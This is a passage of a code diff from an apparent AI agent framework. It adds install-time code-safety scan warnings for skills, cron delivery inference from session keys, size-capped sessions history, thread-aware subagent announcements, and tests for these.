const relativePath = path.relative(rootDir, finding.file);
const filePath =
relativePath && relativePath !== "." && !relativePath.startsWith("..")
? relativePath
: path.basename(finding.file);
return `${finding.message} (${filePath}:${finding.line})`;
}
async function collectSkillInstallScanWarnings(entry: SkillEntry): Promise<string[]> {
const warnings: string[] = [];
const skillName = entry.skill.name;
const skillDir = path.resolve(entry.skill.baseDir);
try {
const summary = await scanDirectoryWithSummary(skillDir);
if (summary.critical > 0) {
const criticalDetails = summary.findings
.filter((finding) => finding.severity === "critical")
.map((finding) => formatScanFindingDetail(skillDir, finding))
.join("; ");
warnings.push(
`WARNING: Skill "${skillName}" contains dangerous code patterns: ${criticalDetails}`,
);
} else if (summary.warn > 0) {
warnings.push(
`Skill "${skillName}" has ${summary.warn} suspicious code pattern(s). Run "openclaw security audit --deep" for details.`,
);
}
} catch (err) {
warnings.push(
`Skill "${skillName}" code safety scan failed (${String(err)}). Installation continues; run "openclaw security audit --deep" after install.`,
);
}
return warnings;
}
function resolveInstallId(spec: SkillInstallSpec, index: number): string {
return (spec.id ?? `${spec.kind}-${index}`).trim();
}
@@ -356,40 +409,51 @@ export async function installSkill(params: SkillInstallRequest): Promise<SkillIn
}
const spec = findInstallSpec(entry, params.installId);
const warnings = await collectSkillInstallScanWarnings(entry);
if (!spec) {
return {
ok: false,
message: `Installer not found: ${params.installId}`,
stdout: "",
stderr: "",
code: null,
};
return withWarnings(
{
ok: false,
message: `Installer not found: ${params.installId}`,
stdout: "",
stderr: "",
code: null,
},
warnings,
);
}
if (spec.kind === "download") {
return await installDownloadSpec({ entry, spec, timeoutMs });
const downloadResult = await installDownloadSpec({ entry, spec, timeoutMs });
return withWarnings(downloadResult, warnings);
}
const prefs = resolveSkillsInstallPreferences(params.config);
const command = buildInstallCommand(spec, prefs);
if (command.error) {
return {
ok: false,
message: command.error,
stdout: "",
stderr: "",
code: null,
};
return withWarnings(
{
ok: false,
message: command.error,
stdout: "",
stderr: "",
code: null,
},
warnings,
);
}
const brewExe = hasBinary("brew") ? "brew" : resolveBrewExecutable();
if (spec.kind === "brew" && !brewExe) {
return {
ok: false,
message: "brew not installed",
stdout: "",
stderr: "",
code: null,
};
return withWarnings(
{
ok: false,
message: "brew not installed",
stdout: "",
stderr: "",
code: null,
},
warnings,
);
}
if (spec.kind === "uv" && !hasBinary("uv")) {
if (brewExe) {
@@ -397,32 +461,41 @@ export async function installSkill(params: SkillInstallRequest): Promise<SkillIn
timeoutMs,
});
if (brewResult.code !== 0) {
return {
ok: false,
message: "Failed to install uv (brew)",
stdout: brewResult.stdout.trim(),
stderr: brewResult.stderr.trim(),
code: brewResult.code,
};
return withWarnings(
{
ok: false,
message: "Failed to install uv (brew)",
stdout: brewResult.stdout.trim(),
stderr: brewResult.stderr.trim(),
code: brewResult.code,
},
warnings,
);
}
} else {
return {
ok: false,
message: "uv not installed (install via brew)",
stdout: "",
stderr: "",
code: null,
};
return withWarnings(
{
ok: false,
message: "uv not installed (install via brew)",
stdout: "",
stderr: "",
code: null,
},
warnings,
);
}
}
if (!command.argv || command.argv.length === 0) {
return {
ok: false,
message: "invalid install command",
stdout: "",
stderr: "",
code: null,
};
return withWarnings(
{
ok: false,
message: "invalid install command",
stdout: "",
stderr: "",
code: null,
},
warnings,
);
}
if (spec.kind === "brew" && brewExe && command.argv[0] === "brew") {
@@ -435,22 +508,28 @@ export async function installSkill(params: SkillInstallRequest): Promise<SkillIn
timeoutMs,
});
if (brewResult.code !== 0) {
return {
ok: false,
message: "Failed to install go (brew)",
stdout: brewResult.stdout.trim(),
stderr: brewResult.stderr.trim(),
code: brewResult.code,
};
return withWarnings(
{
ok: false,
message: "Failed to install go (brew)",
stdout: brewResult.stdout.trim(),
stderr: brewResult.stderr.trim(),
code: brewResult.code,
},
warnings,
);
}
} else {
return {
ok: false,
message: "go not installed (install via brew)",
stdout: "",
stderr: "",
code: null,
};
return withWarnings(
{
ok: false,
message: "go not installed (install via brew)",
stdout: "",
stderr: "",
code: null,
},
warnings,
);
}
}
@@ -479,11 +558,14 @@ export async function installSkill(params: SkillInstallRequest): Promise<SkillIn
})();
const success = result.code === 0;
return {
ok: success,
message: success ? "Installed" : formatInstallFailureMessage(result),
stdout: result.stdout.trim(),
stderr: result.stderr.trim(),
code: result.code,
};
return withWarnings(
{
ok: success,
message: success ? "Installed" : formatInstallFailureMessage(result),
stdout: result.stdout.trim(),
stderr: result.stderr.trim(),
code: result.code,
},
warnings,
);
}

View File

@@ -198,6 +198,85 @@ describe("subagent announce formatting", () => {
expect(call?.params?.accountId).toBe("kev");
});
it("includes threadId when origin has an active topic/thread", async () => {
const { runSubagentAnnounceFlow } = await import("./subagent-announce.js");
embeddedRunMock.isEmbeddedPiRunActive.mockReturnValue(true);
embeddedRunMock.isEmbeddedPiRunStreaming.mockReturnValue(false);
sessionStore = {
"agent:main:main": {
sessionId: "session-thread",
lastChannel: "telegram",
lastTo: "telegram:123",
lastThreadId: 42,
queueMode: "collect",
queueDebounceMs: 0,
},
};
const didAnnounce = await runSubagentAnnounceFlow({
childSessionKey: "agent:main:subagent:test",
childRunId: "run-thread",
requesterSessionKey: "main",
requesterDisplayKey: "main",
task: "do thing",
timeoutMs: 1000,
cleanup: "keep",
waitForCompletion: false,
startedAt: 10,
endedAt: 20,
outcome: { status: "ok" },
});
expect(didAnnounce).toBe(true);
await expect.poll(() => agentSpy.mock.calls.length).toBe(1);
const call = agentSpy.mock.calls[0]?.[0] as { params?: Record<string, unknown> };
expect(call?.params?.channel).toBe("telegram");
expect(call?.params?.to).toBe("telegram:123");
expect(call?.params?.threadId).toBe("42");
});
it("prefers requesterOrigin.threadId over session entry threadId", async () => {
const { runSubagentAnnounceFlow } = await import("./subagent-announce.js");
embeddedRunMock.isEmbeddedPiRunActive.mockReturnValue(true);
embeddedRunMock.isEmbeddedPiRunStreaming.mockReturnValue(false);
sessionStore = {
"agent:main:main": {
sessionId: "session-thread-override",
lastChannel: "telegram",
lastTo: "telegram:123",
lastThreadId: 42,
queueMode: "collect",
queueDebounceMs: 0,
},
};
const didAnnounce = await runSubagentAnnounceFlow({
childSessionKey: "agent:main:subagent:test",
childRunId: "run-thread-override",
requesterSessionKey: "main",
requesterDisplayKey: "main",
requesterOrigin: {
channel: "telegram",
to: "telegram:123",
threadId: 99,
},
task: "do thing",
timeoutMs: 1000,
cleanup: "keep",
waitForCompletion: false,
startedAt: 10,
endedAt: 20,
outcome: { status: "ok" },
});
expect(didAnnounce).toBe(true);
await expect.poll(() => agentSpy.mock.calls.length).toBe(1);
const call = agentSpy.mock.calls[0]?.[0] as { params?: Record<string, unknown> };
expect(call?.params?.threadId).toBe("99");
});
it("splits collect-mode queues when accountId differs", async () => {
const { runSubagentAnnounceFlow } = await import("./subagent-announce.js");
embeddedRunMock.isEmbeddedPiRunActive.mockReturnValue(true);

View File

@@ -233,4 +233,97 @@ describe("cron tool", () => {
expect(call.method).toBe("cron.add");
expect(call.params?.agentId).toBeNull();
});
it("infers delivery from threaded session keys", async () => {
callGatewayMock.mockResolvedValueOnce({ ok: true });
const tool = createCronTool({
agentSessionKey: "agent:main:slack:channel:general:thread:1699999999.0001",
});
await tool.execute("call-thread", {
action: "add",
job: {
name: "reminder",
schedule: { at: new Date(123).toISOString() },
payload: { kind: "agentTurn", message: "hello" },
},
});
const call = callGatewayMock.mock.calls[0]?.[0] as {
params?: { delivery?: { mode?: string; channel?: string; to?: string } };
};
expect(call?.params?.delivery).toEqual({
mode: "announce",
channel: "slack",
to: "general",
});
});
it("preserves telegram forum topics when inferring delivery", async () => {
callGatewayMock.mockResolvedValueOnce({ ok: true });
const tool = createCronTool({
agentSessionKey: "agent:main:telegram:group:-1001234567890:topic:99",
});
await tool.execute("call-telegram-topic", {
action: "add",
job: {
name: "reminder",
schedule: { at: new Date(123).toISOString() },
payload: { kind: "agentTurn", message: "hello" },
},
});
const call = callGatewayMock.mock.calls[0]?.[0] as {
params?: { delivery?: { mode?: string; channel?: string; to?: string } };
};
expect(call?.params?.delivery).toEqual({
mode: "announce",
channel: "telegram",
to: "-1001234567890:topic:99",
});
});
it("infers delivery when delivery is null", async () => {
callGatewayMock.mockResolvedValueOnce({ ok: true });
const tool = createCronTool({ agentSessionKey: "agent:main:dm:alice" });
await tool.execute("call-null-delivery", {
action: "add",
job: {
name: "reminder",
schedule: { at: new Date(123).toISOString() },
payload: { kind: "agentTurn", message: "hello" },
delivery: null,
},
});
const call = callGatewayMock.mock.calls[0]?.[0] as {
params?: { delivery?: { mode?: string; channel?: string; to?: string } };
};
expect(call?.params?.delivery).toEqual({
mode: "announce",
to: "alice",
});
});
it("does not infer delivery when mode is none", async () => {
callGatewayMock.mockResolvedValueOnce({ ok: true });
const tool = createCronTool({ agentSessionKey: "agent:main:discord:dm:buddy" });
await tool.execute("call-none", {
action: "add",
job: {
name: "reminder",
schedule: { at: new Date(123).toISOString() },
payload: { kind: "agentTurn", message: "hello" },
delivery: { mode: "none" },
},
});
const call = callGatewayMock.mock.calls[0]?.[0] as {
params?: { delivery?: { mode?: string; channel?: string; to?: string } };
};
expect(call?.params?.delivery).toEqual({ mode: "none" });
});
});

View File

@@ -1,6 +1,8 @@
import { Type } from "@sinclair/typebox";
import type { CronDelivery, CronMessageChannel } from "../../cron/types.js";
import { loadConfig } from "../../config/config.js";
import { normalizeCronJobCreate, normalizeCronJobPatch } from "../../cron/normalize.js";
import { parseAgentSessionKey } from "../../sessions/session-key-utils.js";
import { truncateUtf16Safe } from "../../utils.js";
import { resolveSessionAgentId } from "../agent-scope.js";
import { optionalStringEnum, stringEnum } from "../schema/typebox.js";
@@ -153,6 +155,72 @@ async function buildReminderContextLines(params: {
}
}
function isRecord(value: unknown): value is Record<string, unknown> {
return typeof value === "object" && value !== null && !Array.isArray(value);
}
function stripThreadSuffixFromSessionKey(sessionKey: string): string {
const normalized = sessionKey.toLowerCase();
const idx = normalized.lastIndexOf(":thread:");
if (idx <= 0) {
return sessionKey;
}
const parent = sessionKey.slice(0, idx).trim();
return parent ? parent : sessionKey;
}
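// Example (from the cron tool tests earlier in this change):
//   "agent:main:slack:channel:general:thread:1699999999.0001"
//     -> "agent:main:slack:channel:general"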
function inferDeliveryFromSessionKey(agentSessionKey?: string): CronDelivery | null {
const rawSessionKey = agentSessionKey?.trim();
if (!rawSessionKey) {
return null;
}
const parsed = parseAgentSessionKey(stripThreadSuffixFromSessionKey(rawSessionKey));
if (!parsed || !parsed.rest) {
return null;
}
const parts = parsed.rest.split(":").filter(Boolean);
if (parts.length === 0) {
return null;
}
const head = parts[0]?.trim().toLowerCase();
if (!head || head === "main" || head === "subagent" || head === "acp") {
return null;
}
// buildAgentPeerSessionKey encodes peers as:
// - dm:<peerId>
// - <channel>:dm:<peerId>
// - <channel>:<accountId>:dm:<peerId>
// - <channel>:group:<peerId>
// - <channel>:channel:<peerId>
// Threaded sessions append :thread:<id>, which we strip so delivery targets the parent peer.
// NOTE: Telegram forum topics encode as <chatId>:topic:<topicId> and should be preserved.
const markerIndex = parts.findIndex(
(part) => part === "dm" || part === "group" || part === "channel",
);
if (markerIndex === -1) {
return null;
}
const peerId = parts
.slice(markerIndex + 1)
.join(":")
.trim();
if (!peerId) {
return null;
}
let channel: CronMessageChannel | undefined;
if (markerIndex >= 1) {
channel = parts[0]?.trim().toLowerCase() as CronMessageChannel;
}
const delivery: CronDelivery = { mode: "announce", to: peerId };
if (channel) {
delivery.channel = channel;
}
return delivery;
}
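// Worked examples (illustrative; these mirror the cron tool tests earlier in this change):
//   "agent:main:slack:channel:general:thread:1699999999.0001"
//     -> { mode: "announce", channel: "slack", to: "general" }
//   "agent:main:telegram:group:-1001234567890:topic:99"
//     -> { mode: "announce", channel: "telegram", to: "-1001234567890:topic:99" }
//   "agent:main:dm:alice"
//     -> { mode: "announce", to: "alice" }
//   "agent:main:main" or "agent:main:subagent:<id>"
//     -> null (no peer to deliver to)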
export function createCronTool(opts?: CronToolOptions): AnyAgentTool {
return {
label: "Cron",
@@ -243,6 +311,35 @@ Use jobId as the canonical identifier; id is accepted for compatibility. Use con
(job as { agentId?: string }).agentId = agentId;
}
}
// [Fix Issue 3] Infer the delivery target from the session key for isolated agentTurn jobs when none is provided explicitly.
if (
opts?.agentSessionKey &&
job &&
typeof job === "object" &&
"payload" in job &&
(job as { payload?: { kind?: string } }).payload?.kind === "agentTurn"
) {
const deliveryValue = (job as { delivery?: unknown }).delivery;
const delivery = isRecord(deliveryValue) ? deliveryValue : undefined;
const modeRaw = typeof delivery?.mode === "string" ? delivery.mode : "";
const mode = modeRaw.trim().toLowerCase();
const hasTarget =
(typeof delivery?.channel === "string" && delivery.channel.trim()) ||
(typeof delivery?.to === "string" && delivery.to.trim());
const shouldInfer =
(deliveryValue == null || delivery) && mode !== "none" && !hasTarget;
if (shouldInfer) {
const inferred = inferDeliveryFromSessionKey(opts.agentSessionKey);
if (inferred) {
(job as { delivery?: unknown }).delivery = {
...delivery,
...inferred,
} satisfies CronDelivery;
}
}
}
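// Note: jobs that already name a target (e.g. { channel: "slack", to: "some-channel" })
// or explicitly opt out with { mode: "none" } are left untouched; only missing or
// target-less deliveries on agentTurn payloads are filled in above.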
const contextMessages =
typeof params.contextMessages === "number" && Number.isFinite(params.contextMessages)
? params.contextMessages

View File

@@ -24,6 +24,8 @@ import {
} from "./image-tool.helpers.js";
const DEFAULT_PROMPT = "Describe the image.";
const ANTHROPIC_IMAGE_PRIMARY = "anthropic/claude-opus-4-6";
const ANTHROPIC_IMAGE_FALLBACK = "anthropic/claude-opus-4-5";
export const __testing = {
decodeDataUrl,
@@ -117,7 +119,7 @@ export function resolveImageModelConfigForTool(params: {
} else if (primary.provider === "openai" && openaiOk) {
preferred = "openai/gpt-5-mini";
} else if (primary.provider === "anthropic" && anthropicOk) {
preferred = "anthropic/claude-opus-4-5";
preferred = ANTHROPIC_IMAGE_PRIMARY;
}
if (preferred?.trim()) {
@@ -125,7 +127,7 @@ export function resolveImageModelConfigForTool(params: {
addFallback("openai/gpt-5-mini");
}
if (anthropicOk) {
addFallback("anthropic/claude-opus-4-5");
addFallback(ANTHROPIC_IMAGE_FALLBACK);
}
// Don't duplicate primary in fallbacks.
const pruned = fallbacks.filter((ref) => ref !== preferred);
@@ -138,7 +140,7 @@ export function resolveImageModelConfigForTool(params: {
// Cross-provider fallback when we can't pair with the primary provider.
if (openaiOk) {
if (anthropicOk) {
addFallback("anthropic/claude-opus-4-5");
addFallback(ANTHROPIC_IMAGE_FALLBACK);
}
return {
primary: "openai/gpt-5-mini",
@@ -146,7 +148,10 @@ export function resolveImageModelConfigForTool(params: {
};
}
if (anthropicOk) {
return { primary: "anthropic/claude-opus-4-5" };
return {
primary: ANTHROPIC_IMAGE_PRIMARY,
fallbacks: [ANTHROPIC_IMAGE_FALLBACK],
};
}
return null;

View File

@@ -2,7 +2,9 @@ import { Type } from "@sinclair/typebox";
import type { AnyAgentTool } from "./common.js";
import { loadConfig } from "../../config/config.js";
import { callGateway } from "../../gateway/call.js";
import { capArrayByJsonBytes } from "../../gateway/session-utils.fs.js";
import { isSubagentSessionKey, resolveAgentIdFromSessionKey } from "../../routing/session-key.js";
import { truncateUtf16Safe } from "../../utils.js";
import { jsonResult, readStringParam } from "./common.js";
import {
createAgentToAgentPolicy,
@@ -19,6 +21,131 @@ const SessionsHistoryToolSchema = Type.Object({
includeTools: Type.Optional(Type.Boolean()),
});
const SESSIONS_HISTORY_MAX_BYTES = 80 * 1024;
const SESSIONS_HISTORY_TEXT_MAX_CHARS = 4000;
function truncateHistoryText(text: string): { text: string; truncated: boolean } {
if (text.length <= SESSIONS_HISTORY_TEXT_MAX_CHARS) {
return { text, truncated: false };
}
const cut = truncateUtf16Safe(text, SESSIONS_HISTORY_TEXT_MAX_CHARS);
return { text: `${cut}\n…(truncated)…`, truncated: true };
}
function sanitizeHistoryContentBlock(block: unknown): { block: unknown; truncated: boolean } {
if (!block || typeof block !== "object") {
return { block, truncated: false };
}
const entry = { ...(block as Record<string, unknown>) };
let truncated = false;
const type = typeof entry.type === "string" ? entry.type : "";
if (typeof entry.text === "string") {
const res = truncateHistoryText(entry.text);
entry.text = res.text;
truncated ||= res.truncated;
}
if (type === "thinking") {
if (typeof entry.thinking === "string") {
const res = truncateHistoryText(entry.thinking);
entry.thinking = res.text;
truncated ||= res.truncated;
}
// The encrypted signature can be extremely large and is not useful for history recall.
if ("thinkingSignature" in entry) {
delete entry.thinkingSignature;
truncated = true;
}
}
if (typeof entry.partialJson === "string") {
const res = truncateHistoryText(entry.partialJson);
entry.partialJson = res.text;
truncated ||= res.truncated;
}
if (type === "image") {
const data = typeof entry.data === "string" ? entry.data : undefined;
const bytes = data ? data.length : undefined;
if ("data" in entry) {
delete entry.data;
truncated = true;
}
entry.omitted = true;
if (bytes !== undefined) {
entry.bytes = bytes;
}
}
return { block: entry, truncated };
}
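// Examples (illustrative): an image block { type: "image", data: "<base64…>" } comes back
// as { type: "image", omitted: true, bytes: <original data length> } with the payload dropped;
// a "thinking" block keeps its (possibly truncated) text but loses thinkingSignature.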
function sanitizeHistoryMessage(message: unknown): { message: unknown; truncated: boolean } {
if (!message || typeof message !== "object") {
return { message, truncated: false };
}
const entry = { ...(message as Record<string, unknown>) };
let truncated = false;
// Tool result details often contain very large nested payloads.
if ("details" in entry) {
delete entry.details;
truncated = true;
}
if ("usage" in entry) {
delete entry.usage;
truncated = true;
}
if ("cost" in entry) {
delete entry.cost;
truncated = true;
}
if (typeof entry.content === "string") {
const res = truncateHistoryText(entry.content);
entry.content = res.text;
truncated ||= res.truncated;
} else if (Array.isArray(entry.content)) {
const updated = entry.content.map((block) => sanitizeHistoryContentBlock(block));
entry.content = updated.map((item) => item.block);
truncated ||= updated.some((item) => item.truncated);
}
if (typeof entry.text === "string") {
const res = truncateHistoryText(entry.text);
entry.text = res.text;
truncated ||= res.truncated;
}
return { message: entry, truncated };
}
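// At the message level, details/usage/cost are always dropped and long string content
// is truncated; block-level sanitization above handles the rest.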
function jsonUtf8Bytes(value: unknown): number {
try {
return Buffer.byteLength(JSON.stringify(value), "utf8");
} catch {
return Buffer.byteLength(String(value), "utf8");
}
}
function enforceSessionsHistoryHardCap(params: {
items: unknown[];
bytes: number;
maxBytes: number;
}): { items: unknown[]; bytes: number; hardCapped: boolean } {
if (params.bytes <= params.maxBytes) {
return { items: params.items, bytes: params.bytes, hardCapped: false };
}
const last = params.items.at(-1);
const lastOnly = last ? [last] : [];
const lastBytes = jsonUtf8Bytes(lastOnly);
if (lastBytes <= params.maxBytes) {
return { items: lastOnly, bytes: lastBytes, hardCapped: true };
}
const placeholder = [
{
role: "assistant",
content: "[sessions_history omitted: message too large]",
},
];
return { items: placeholder, bytes: jsonUtf8Bytes(placeholder), hardCapped: true };
}
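// Fallback order (illustrative): keep everything while under the 80 KiB
// SESSIONS_HISTORY_MAX_BYTES cap, otherwise keep only the newest message, and if
// even that single message is too large, return the placeholder message above.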
function resolveSandboxSessionToolsVisibility(cfg: ReturnType<typeof loadConfig>) {
return cfg.agents?.defaults?.sandbox?.sessionToolsVisibility ?? "spawned";
}
@@ -131,10 +258,26 @@ export function createSessionsHistoryTool(opts?: {
params: { sessionKey: resolvedKey, limit },
});
const rawMessages = Array.isArray(result?.messages) ? result.messages : [];
const messages = includeTools ? rawMessages : stripToolMessages(rawMessages);
const selectedMessages = includeTools ? rawMessages : stripToolMessages(rawMessages);
const sanitizedMessages = selectedMessages.map((message) => sanitizeHistoryMessage(message));
const contentTruncated = sanitizedMessages.some((entry) => entry.truncated);
const cappedMessages = capArrayByJsonBytes(
sanitizedMessages.map((entry) => entry.message),
SESSIONS_HISTORY_MAX_BYTES,
);
const droppedMessages = cappedMessages.items.length < selectedMessages.length;
const hardened = enforceSessionsHistoryHardCap({
items: cappedMessages.items,
bytes: cappedMessages.bytes,
maxBytes: SESSIONS_HISTORY_MAX_BYTES,
});
return jsonResult({
sessionKey: displayKey,
messages,
messages: hardened.items,
truncated: droppedMessages || contentTruncated || hardened.hardCapped,
droppedMessages: droppedMessages || hardened.hardCapped,
contentTruncated,
bytes: hardened.bytes,
});
},
};

View File

@@ -231,6 +231,10 @@ export function createSessionsSpawnTool(opts?: {
message: task,
sessionKey: childSessionKey,
channel: requesterOrigin?.channel,
to: requesterOrigin?.to ?? undefined,
accountId: requesterOrigin?.accountId ?? undefined,
threadId:
requesterOrigin?.threadId != null ? String(requesterOrigin.threadId) : undefined,
idempotencyKey: childIdem,
deliver: false,
lane: AGENT_LANE_SUBAGENT,